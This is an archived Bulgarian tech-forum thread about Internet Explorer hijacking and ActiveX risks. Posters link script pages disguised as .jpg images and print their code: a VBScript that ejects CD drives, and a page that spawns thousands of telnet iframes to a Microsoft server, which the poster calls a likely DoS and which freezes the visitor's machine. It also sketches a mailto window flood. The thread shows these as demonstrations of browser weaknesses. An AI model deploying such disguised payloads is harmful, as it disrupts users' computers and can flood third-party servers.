Jump to content
BulForum.com

ВИРУС .... може би ;(

HAKERA®

By HAKERA®
in Разни

Recommended Posts

HAKERA® Напреднал Член

HAKERA®

Posted
Posted

Мисля, че ме е хванало нещо, но не знам точно какво и не мисля, че антивир ще го хване... Проблема е там, че когато отворя Internet Explorer започва да отваря някаква страница, която никога не я бях виждал преди да ме зарази и просто нищо не можеш да направиш :( www.warez.ru ми е HomePage , но то не отваря нея, а другата страница. Като му дам Stop и в Addres Bar-а се вижда адреса.... ако го видите колко е дълъг :wir . След като съм му дал Stop набирам www.warez.ru и му давам Go, но то пак започва да зарежда първата :( . Самата страница, която се опитва да отвори (и в крайна сметка естествено не я отваря) в Status Bar-а пише www.incredifind.com НЕ я отваряйте, щото мисля, че тя може да ви зарази (Не съм сигурен все пак) И само да кажа, че не пише Openning site , а пише през цялото време Finding Site: преди адреса .....

 

Моля някой да помогне, щото без Internet Explorer е кофти... Трябва да се кара само на MSN Explorer, което е гадно.....

Link to comment
Share on other sites
tedy Jedi Master

tedy

Posted
Posted

Хора, изключете си тва ActiveX от Интернет Експлорър, от него ви идват повечето злини от сайтовете!

Има много демо-та на това какво може то, и ако искате ще ви дам един линк който да ви демонстрира, че някои доста очевадни бъгове в ИЕ не са оправени дори в Вин2003, и те все са свързани с ActiveX!

Link to comment
Share on other sites
en3rgy Дървен Философ

en3rgy

Posted
Posted

priqtel i az sym bil na tvoq hal, explorer (windows) mi se zarejda6e za ne po malko ot 1min, pa po edno vreme dori win98 ne moje6e da zaredi - gyrme6e pri startirane.

na4i vij v add/remove programs za nqkvi novi i nepoznati (obiknoveno gi ima tam), po windows dir vij fajlove deto sa novi i stranni (po vremeto deto si svalil tozi ad-ware) ma glej da ne iztrie6 ne6to ot win-a ;)

proveri kvo ima6 stranno v pametta v momenta

 

probvaj s f-prot toj otkriva nqkoi ad-ware i spy-ware

Link to comment
Share on other sites
tedy Jedi Master

tedy

Posted
Posted

Ето ви и линка, както виждате - обикновена картинка (.jpg), но си оставете ActiveX в IE включен и отворете 'картинката' с IE и се дръпнете от кутията на компютъра обаче :P

Не се притеснявайте, съвсем безобидно е, само демонстрира една от големите дупки в IE:

http://free.top.bg/teodh/security/crg.jpg

Link to comment
Share on other sites
Backbone Депутат

Backbone

Posted
Posted

Как се маха ActiveX че ме оплаши с тази картинка.Представи си вместо картинка да ти оверклоква видео карта като Power Strip i posle boom :angry1 :angry1 :angry1

Link to comment
Share on other sites
HAKERA® Напреднал Член

HAKERA®

Posted
  • Author
Posted

Нали не може да ми направи нищо в MSN Explorer? ... btw аз поразгледах малко, побъжиках се малко и вече не отваря онази страница, а се опитва да си отвори warez-а, но пак не успява :( и между другото какво се предполага, че трябва да прави оная картинка?

Link to comment
Share on other sites
DeZoeker Гуру

DeZoeker

Posted
Posted
Как се маха ActiveX че ме оплаши с тази картинка.

Tools > Internet Options > Security > Select a Web content zone to specify its security settings. > Internet > Security level for this zone > Custom Level...

ActiveX controls and plug-ins

Заменяш Enable с Disable.

Link to comment
Share on other sites
Krasi Напреднал Член

Krasi

Posted
Posted

На мен ми отваря празна страница и ми дава съобщение за грешка "Permission denied" или нещо подобно. настройките за защита ми са по подразбиране.не виждам картинката и не мога да разбера за какво става въпрос

Link to comment
Share on other sites
Stenli Шеф на Водопад

Stenli

Posted
Posted
не виждам картинката и не мога да разбера за какво става въпрос

Като отвориш картинката с ИЕ ти отваря CD-то :P

Link to comment
Share on other sites
ov3rm4n Шеф на Водопад

ov3rm4n

Posted
Posted
az da pitam...toku shto otvorih foruma i izvednuj zapo4na Ie da nabira nqkuf URL:

www.cowboyscript.com mai....Tova script,virus li e i zashto se poqvi v wareza?

:blink:

A, i kolko sigurno mogesh da surfirash v wareza?

Тц. Не е от форума. При мен, а и на другите машини на които ми се случва да сядам няма такова нещо. Това което ви е гепило е hijacking - променили са ви началната страница на браузъра, адреса на "about: blank", адреса на търсачката по подразбиране и още една камара настройки на Експлодера (например, когато напишете просто адрес в полето, без да указвате протокол (http://), браузъра си знае, че трябва да го добави отпред - гадинките променят тази настройка и вместо http:// го прави на http://some.evil.site/tracker.shtml?адреса...въвеждате-е-тук - така пак стигате до там където искате, но минавате през сайта на гадината и тя записва къде ходите...) - всичко това в регистрите на Уин... Трябва ви програмка за изчистване и възстановяване на нормалните настройки. Има ги много из Мрежата - просто пуснете Гугъл на hijacking...

 

EDIT: с AdWare или антивирусни не става.

Link to comment
Share on other sites
en3rgy Дървен Философ

en3rgy

Posted
Posted

ehehe suuuper qko :devil

Не се притеснявайте, съвсем безобидно е, само демонстрира една от големите дупки в IE: http://free.top.bg/teodh/security/crg.jpg

a eto go i vyprosnoto jpg:

<script language=VBScript>
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
        For i = 0 to colCDROMs.Count - 1
                colCDROMs.Item(i).Eject
        Next ' cdrom
End If
-->
</SCRIPT>

naj mi e interesno 6to ne me pita IE dali da go izpylni ActivX-a, qvno ot mico$oft sa smetnali 4e po podrazbirane e bezopasno :bgrin: :angry1

 

vij dali nqma6 nqkvo typo proxy napisano, 1 pyt sym vijdal i takova 4udo

Link to comment
Share on other sites
tedy Jedi Master

tedy

Posted
Posted

:) Въпросът е не дали да те пита или не (това може да се настрои от опциите),

а такива неща да не се случват въобще. Аз не мога да си представя какъв генерален пропуск са направили от М$ браузъра да може да изпълнява така код, маскиран като картинка, получавайки съответния хедър за нея (който указва че това е картинка в крайна сметка бе мааму стара.. :angry1

Не стига това, ами и чрез ActiveX могат да ти правят мизерии в компа, да ти подменят хоум пейдж (това и с JS става де), по едно време и data.bg пускаше червеи точно така.

Трябва абсолютно всеки начин да ти се пише по диска сърфирайки по нета да бъде елиминиран! Все още има куп подобни недоглеждания, от които да се пазим. Просто изключете ActiveX и готово. Страничен ефект е, че така забранявате и Flash-a, но за целта аз ползвам други браузъри.

Link to comment
Share on other sites
ov3rm4n Шеф на Водопад

ov3rm4n

Posted
Posted

Сега пак ще кажете, че се заяждам, ама... Проблема е че, като използваш Уиндоус на компютъра си - той вече не е твой. Буквално. И брутално. Има милион и един варианта през най-обикновена уеб страничка да ти измъкна каквото си поискам от машината. Просто така са го направили. Не че това са искали да стане - никой не ги обвинява в това - направено е с цел да е по удобно да ти се предлагат най-различни услуги през Мрежата, дето са последен писък на хай-тека... Но страничните вредни ефекти са повече от ползата в крайна сметка... Вината на Малкомек е, че всички тия писъци на технологията ти идват разрешени и действащи, вместо да оставят на теб да прецениш дали да ги използваш или можеш да минеш и без тях, след като естествено те запознаят със всички аспекти на проблема. И то е ясно защо го правят така - защото ако на нормален чонек му обясниш всичко това, което може да му причини ActiveX примерно, щото той е само част от всичкото, какво според теб ще е решението на човека?!

Link to comment
Share on other sites
tedy Jedi Master

tedy

Posted
Posted

Между другото точно сега един приятел ми показа още една подобна дупка в ИЕ.

Тя пак се маскира под картинка, но е скрипт, който отваря 1200 (или повече бяха) telnet сесии към microsoft на порт 80 (явно пак за атакуване (DoS) на уеб сървъра им). Всяка сесия е с свой бутон в таскбара и машината става почти неуправляема през това време. Е, аз имах файруол, който не пусна нито една конекция, и чрез таск мениджъра килнах някак си постоянно увеличаващите се прозорци, преди да станат толкова много че да забие компа.

Който има нерви, и в момента не работи с нищо друго (аз работех и за щастие бях сейвнал всичко, макар че не се наложи рестарт)

може да пробва да види ефекта и му гарантирам, че ще го откажа да ползва ИЕ :)

 

ПРЕДУПРЕЖДЕНИЕ: Прочетете ВНИМАТЕЛНО какво съм писал, че прави скрипта ПРЕДИ да го пробвате! Ако въобще го пробвате :)

 

http://moo.ru/temp/kane.jpg

 

А ето ви и кода на 'картинката':

<html>
<body>
<H1> Sorry, but you've been awared... </H1>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

</body>
</html>

 

EDIT: Както виждате, тук дори не ви трябва ActiveX, това работи ипри изключен ActiveX!!

 

И представете си код подобен на това:

for a=1 to 1000

document.write("<iframe src=" + chr(34) + "mailto:a@a.com" + chr(34) + ">")

 

което отваря хиляда (числото може да и 100000, кой както иска) прозореца на Outlook Express, който е графично интензивен, не е конзола, какво ще стане. Въпрос на въображение ;)

БТВ пробвах с command:telnet, за 'щастие' не стана (това последното може да мине за цинизъм спрямо потребителите на М$).

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...